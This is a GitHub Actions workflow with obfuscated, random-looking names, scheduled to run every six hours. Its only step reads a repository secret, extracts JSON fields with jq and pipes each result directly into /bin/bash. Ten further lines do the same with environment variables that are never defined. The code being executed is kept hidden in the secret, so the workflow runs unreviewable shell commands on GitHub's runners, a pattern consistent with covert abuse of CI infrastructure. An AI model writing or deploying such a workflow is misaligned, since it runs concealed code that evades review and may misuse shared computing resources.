name: jiyunqian4189
on:
  workflow_dispatch:
  schedule:
    - cron: '0 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiyunqian4189
        env:
          kbgpo55: ${{ secrets.kbgpo55 }}
        run: |
          echo $kbgpo55 | jq -r .u27424 | /bin/bash
          echo $vcrzb9 | jq -r .ftxl70058 | /bin/bash
          echo $yngn340 | jq -r .sy96 | /bin/bash
          echo $noeh159 | jq -r .shcz0 | /bin/bash
          echo $c42458 | jq -r .a9 | /bin/bash
          echo $sp53862 | jq -r .slb121 | /bin/bash
          echo $qvfc955 | jq -r .jxds36 | /bin/bash
          echo $lwcew51 | jq -r .ak74451 | /bin/bash
          echo $vuyvg739 | jq -r .ic23 | /bin/bash
          echo $q506 | jq -r .kri7 | /bin/bash
          echo $jr49 | jq -r .uyu20 | /bin/bash

